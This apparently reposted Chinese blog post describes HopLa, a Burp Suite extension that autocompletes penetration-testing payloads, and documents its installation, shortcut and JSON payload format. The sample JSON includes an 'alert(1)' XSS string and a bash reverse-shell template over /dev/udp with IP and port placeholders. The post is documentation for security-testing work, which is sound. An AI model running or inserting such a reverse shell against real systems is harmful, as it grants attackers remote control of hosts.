burpsuite插件之HopLa自动补全payloads|可自行diy

burpsuite插件之HopLa自动补全payloads|可自行diy

HopLa Burp Suite Extender插件-在Burp Suite中添加自动补全支持和有用的有效负载.

PayloadsAllTheThings的所有功能,而无需额外输入。此扩展在Burp Suite中添加了自动补全支持和有用的有效负载,使入侵变得更容易。

随时改善您的有效载荷!

burpsuite插件之HopLa自动补全payloads|可自行diy

入门

安装

  • 从发布目录下载jar文件
  • 使用“扩展器”选项卡将其添加到Burp Suite

建造

执行gradle build,您将在中准备好插件releases/HopLa.jar

用法

burpsuite插件之HopLa自动补全payloads|可自行diy

默认情况下,HopLa随附了默认的有效负载。您可以通过在菜单中加载自定义JSON文件来添加自己的文件。

HopLa首次使用时会创建一个JSON文件,其中包含jar文件目录中的所有有效负载。

按下Ctrl+Q以显示有效载荷库菜单。

您可以在顶部菜单中禁用全局自动补全功能。

对于i3,将以下行添加到$HOME/.config/i3/config浮动框架中:

for_window [class=".*burp-StartBurp.*" title="^ $"] floating enable

如何添加有效载荷

JSON有效负载文件遵循以下结构:

{
     "categories": [
         {
             "name": "XSS",
             "values": [
                 {
                     "name": "Simple",
                     "value": "alert(1)
"
                 },
                 {
                     "name": "Multiline",
                     "value": "AAAA\nBBBB"
                 },
                 {
                     "name" : "Nested XSS menu",
                     "values": [
                         {
                             "name": "Simple 2",
                             "value": "alert(1)
"
                         }
                     ]
                 }
             ]
         }
     ],
     "keywords": [
         {
             "name": "Headers",
             "values": [
                 "X-Forwarded-For",
                 "X-Originally-Forwarded-For",
                 "X-Originating-Ip",
                 "X-Originating-IP"
             ]
         }
     ]
 }

没有嵌套限制。

您可以自动添加一个提示对话框:

{
     "name":  "Bash UDP",
     "value":  "sh -i >& /dev/udp/§IP§/§PORT§ 0>&1",
     "prompt": ["IP","PORT"]
 },

要仅添加菜单中未显示的关键字,可以将其添加到关键字类别中:

{
    "keywords": [
        {
            "name": "Headers",
            "values": [
                "X-Forwarded-For",
                "X-Originally-Forwarded-For",
                "X-Originating-Ip",
                "X-Originating-IP"
            ]
        }
    ]
}

HopLa插件下载地址

①GitHub: HopLa.jar
②迅雷网盘: https://pan.xunlei.com/ 提取码: db43
解压密码: www.ddosi.org

HopLa插件截图

快捷键ctrl Q

burpsuite插件之HopLa自动补全payloads|可自行diy

XSS payloads

burpsuite插件之HopLa自动补全payloads|可自行diy

文件读取

burpsuite插件之HopLa自动补全payloads|可自行diy

自定义payloads

如需修改payloads,到插件所在目录下的config.json文件里修改

burpsuite插件之HopLa自动补全payloads|可自行diy

自带的payloads比较少,建议替换成自己的.

路线图

  • 支持有效载荷菜单的自定义键绑定

谢谢

非常感谢您的出色工作!

from

Leave a Reply

您的电子邮箱地址不会被公开。